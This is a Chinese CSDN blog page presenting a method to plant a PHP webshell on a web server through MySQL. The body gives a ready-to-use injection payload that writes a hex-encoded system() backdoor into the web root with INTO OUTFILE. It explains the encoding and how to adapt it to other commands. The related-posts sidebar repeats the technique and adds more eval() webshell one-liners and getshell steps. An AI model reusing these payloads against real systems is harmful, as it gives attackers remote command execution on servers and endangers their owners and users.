mysql 木马_用Mysql语句来生成后门木马方案

最新推荐文章于 2022-04-01 15:47:41 发布
最新推荐文章于 2022-04-01 15:47:41 发布
阅读量265 收藏
点赞数
文章标签: mysql 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42509847/article/details/113337750
版权

下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句来生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案。

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,

3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E

from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过MySQL(和PHP搭配之***组合) 的注入或者在 phpmyadmin 里运行以上Mysql语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3<?phpsystem ($_REQUEST[cmd]);?>

就可以执行系统DOS命令!

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?

就是<?php system($_REQUEST[cmd]);?>的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

200122.htm

以上的相关内容就是对通过Mysql语句生成后门木马的方法的介绍,望你能有所收获。

【编辑推荐】

【责任编辑:孙巧华 TEL:(010)68476606】

点赞 0

空谷幽兰月影寒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 319
复现mysql 备份上传木马,并用shell工具连接操作
mysql_markdown:可以简洁地生成MySQL的markdown结构文件〜
02-02
可以简洁地生成MySQL的markdown结构文件〜背景在实施软件工程的时候,当要逐步增加版本时,需要汇总的文档要求还是比较高,类别文档齐全,包括项目架构,项目安装,接口等文档,而数据库表结构说明文档也属于其一。...
mysql 木马_通过mysql写入一句话木马
weixin_34641420的博客
01-27 1866
USEmysql;# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('');# 影响列数:1# 影响列数:1SELECTcmd1FROMaINTO...
mysql写入木马getshell总结
orange777
02-25 5136
1、select into outfile写入木马 2、SQL语句利用日志写shell 3、sqlmap写入一句话getshell
MYSQL数据库写马讲解
qq_49422880的博客
04-01 2603
MYSQL数据库写马讲解0x01 前言0x02 日志写🐎0x03 into outfile写🐎 0x01 前言   最近正好在上数据库的课程,比较详细地学习了数据库各个方面地知识。感觉解决了之前不少的疑惑,再吐槽一下(学校开数据库这门课开的太晚了!)   下面进行分析与讲解数据库写入马的过程。 0x02 日志写🐎 众所周知我们所有的数据库的都有一个存放日志的文件,这个文件可以会进行记录数据库的操作语句,也可能不会记录数据库的操作语句,这却决于两个全局变量: general_log==>日志保存状态,有
mysql插入木马_运用Mysql语句生成后门木马的具体方法_mysql
weixin_42316952的博客
01-27 298
通过mysql语句生成后门木马的方法:以下为引用的内容:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd....
MySQL GROUP_CONCAT限制解决方案
12-14
 如果需要自定义分隔符可以使用 SEPARATOR  如: SELECT GROUP_CONCAT(name SEPARATOR '_') FROM user 限制:  GROUP_CONCAT 拼接的字符串的长度字节默认长度1024个字节,超过则会被截断。 查询默认长度:  ...
MySQL数据库介绍及高可用方案_方案_MYSQL_directionhkc_
09-28
mysql 数据库介绍和其高可用方案,介绍 mysql 高可用方案
mysql.rar_mysql语句
09-19
mysql中的一些基本语句,包括增加、删除、修改等功能,可以重复使用。
MySQL.rar_mysql语句
09-21
MySQL语法语句大全,这是多年我收集整理出来的实用文档
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL
gscaiyucheng的专栏
02-28 9951
昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EXISTS temp; //如果存在temp就删掉   Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段   Insert INT
利用mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL
weixin_32008105的博客
02-05 239
通过Mysql语句生成后门木马的方法!SELECT * FROM `vbb_strikes`WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mys...
mysql创建木马_用Mysql语句生成后门木马方案
weixin_42347600的博客
02-05 120
下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案。SELECT*FROM`vbb_strikes`WHERE1unionselect2,3,0x3C3F7068702073797374656D28245F524551554553545B...
mysql创建木马_Mysql语句生成后门木马的方法
weixin_39835607的博客
02-18 111
咳咳,大家看看就好了,本人不负责所产生的后果代码如下:SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.p...
MySQL注入之木马上传拿webshell
热门推荐
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
mysql数据库木马查杀_Linux系统木马后门查杀方法详解
weixin_30607125的博客
02-08 435
木马后门的查杀是系统管理员一项长期需要坚持的工作,切不可掉以轻心。以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法:一、Web Server(以Nginx为例)1、为防止跨站感染,将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)3、path_info漏洞修正:在nginx配置文件...
通过mysql能植入木马_通过Mysql语句生成后门木马的方法
weixin_26950847的博客
01-19 137
通过Mysql语句生成后门木马的方法!SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过M...
navicat_for_mysql使用sql语句
最新发布
08-17
你可以在Navicat中使用SQL语句来连接数据库、新建数据库、创建表、进行增删改查等操作。通过点击连接MySQL按钮,选择连接localhost,然后右键点击localhost打开连接,即可查看本地服务器信息。接下来,你可以右键...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值